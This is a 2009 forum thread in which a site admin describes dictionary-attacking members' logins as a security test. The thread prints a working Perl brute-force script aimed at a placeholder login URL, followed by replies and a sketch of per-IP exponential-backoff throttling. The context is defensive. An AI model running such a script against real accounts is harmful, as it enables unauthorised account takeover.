Congratulations Members of The VG Press
Country: US
Comments: 6470
News Posts: 413
Joined: 2008-06-21
 
Sat, 07 Mar 2009 05:06:40
0
You have officially passed the stupid password test!


I have been working on a couple security improvements for the site relating to login and authentication.  Primarily on a policy to handle failed logins and bot attacks.  Doing so necessitates the testing thereof, and I have thusly created a script to perform a dictionary attack.


A dictionary attack is very simple; a program tries repeatedly to log into an account using a list of words, often a dictionary, as words are commonly used as passwords because they're easily remembered.


So what does this have to do with you, a loyal VG Press user?  Well, contrary to what you may think, I have no idea what your password is!  Every password is one-way encrypted before being sent to the server, then salted and hashed once more for good measure, so I can only see a garbled mess in the database.


So I set loose my script using a list of the 500 worst passwords that allegedly encompasses the passwords of 1 in every 9 users.


But every active VG Press member has a password that is not on the list of the 500 worst.  Hoorah!



BONUS SECTION


For those interested in the code behind the attack, it was written in Perl.  So as not to needlessly give out a program to do this to a live site, this isn't the exact program, but it's effectively the same.

 
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

$file = "dictionary.txt";
open FILE, $file or die $!;
print "Enter Username: ";
my $input = <STDIN>;
$username = substr $input, 0, (length $input)-1;
while(my $line = <FILE>)
{
    $word = substr $line, 0, (length $line)-1;
    do
    {
        $ua = LWP::UserAgent->new;
        $ua->timeout(3);
        my $req = (POST 'http://insecuresite.com/login',
            ["username" => $username,
             "password" => $word]);
        $response = $ua->request($req);
        $content = $response->content;
    }
    while($content == "500 read timeout");

    if(!(length $content > 0))
    {
        print "PASSWORD: $word\n";
        exit;
    }
}
close FILE;
print "No matches found\n";
exit;

---

Tell me to get back to rewriting this site so it's not horrible on mobile
Country: CA
Comments: 654
News Posts: 6
Joined: 2008-06-21
 
Sat, 07 Mar 2009 05:20:45
0
So are you implementing a "Too many failed logins!" functionality into the site, or what do you plan on doing to counteract dictionary/script attacks like these and others?

Country: US
Comments: 6470
News Posts: 413
Joined: 2008-06-21
 
Sat, 07 Mar 2009 05:39:44
0
The likely solution is going to be exponentially increasing minimum time period between log-in attempts based on IP address.

---

Tell me to get back to rewriting this site so it's not horrible on mobile
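
Added example, not part of the original thread and not the site's code: a minimal in-memory sketch of the per-IP, exponentially increasing wait between login attempts described in the reply above, with a simulation of how many guesses one address gets checked in an hour. The class and function names, the 1-second base, the 1-hour cap, the 24-hour reset and the simulated client are all assumptions.

```python
import time

class LoginThrottle:
    """In-memory per-IP throttle: the wait doubles after every failed login."""

    def __init__(self, base=1.0, cap=3600.0, forget_after=86400.0,
                 clock=time.monotonic):
        self.base, self.cap, self.forget_after = base, cap, forget_after
        self.clock = clock
        self._failed = {}  # ip -> (consecutive failures, time of last failure)

    def retry_after(self, ip):
        """Seconds this IP must still wait; 0.0 means an attempt is allowed."""
        failures, last = self._failed.get(ip, (0, 0.0))
        if failures == 0:
            return 0.0
        now = self.clock()
        if now - last >= self.forget_after:      # stale entry: start over
            del self._failed[ip]
            return 0.0
        # base, 2*base, 4*base, ... capped; exponent clamped to avoid overflow
        wait = min(self.base * 2 ** min(failures - 1, 32), self.cap)
        return max(0.0, last + wait - now)

    def attempt(self, ip, verify):
        """Call verify() only outside the wait window. Returns (ok, wait)."""
        wait = self.retry_after(ip)
        if wait > 0:
            return False, wait          # rejected without testing the password
        if verify():
            self._failed.pop(ip, None)  # success clears the history
            return True, 0.0
        failures, _ = self._failed.get(ip, (0, 0.0))
        self._failed[ip] = (failures + 1, self.clock())
        return False, self.retry_after(ip)

def guesses_checked(duration, interval, base=1.0, cap=3600.0):
    """Simulate one IP sending a wrong password every `interval` seconds for
    `duration` seconds; return how many guesses were actually verified."""
    now, checked = [0.0], 0                      # constructed fake clock
    throttle = LoginThrottle(base, cap, clock=lambda: now[0])
    ip = "203.0.113.7"                           # constructed, documentation range
    while now[0] < duration:
        if throttle.retry_after(ip) == 0:        # this guess will be verified
            checked += 1
        throttle.attempt(ip, lambda: False)      # always-wrong password
        now[0] += interval
    return checked
```

Per-IP state does not slow guesses spread across many addresses and can delay legitimate users behind a shared address, so it is commonly paired with a per-account failure counter.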
Country: UN
Comments: 16255
News Posts: 1043
Joined: 2008-06-21
 
Sat, 07 Mar 2009 05:43:17
0
Damn, I was hoping that password would be number!

Country: UN
Comments: 19375
News Posts: 9398
Joined: 2008-08-18
 
Sat, 07 Mar 2009 08:12:18
0

Fuckin' A man!

Country: GB
Comments: 48515
News Posts: 59786
Joined: 2008-06-21
 
Sun, 08 Mar 2009 11:22:33
0
I made my password specifically because I thought you could see it Yo. Sad

Country: CA
Comments: 97
News Posts: 1
Joined: 2008-06-25
 
Tue, 10 Mar 2009 01:01:26
0
Then it's a good thing I recently changed my password from "pussy" to something else. WinkWink
Country: UN
Comments: 17323
News Posts: 2811
Joined: 2008-06-21
 
Tue, 10 Mar 2009 20:48:41
0
Those 500 worst passwords are pretty funny. LOL Thankfully, mine's not even close to anything on that list. Happy
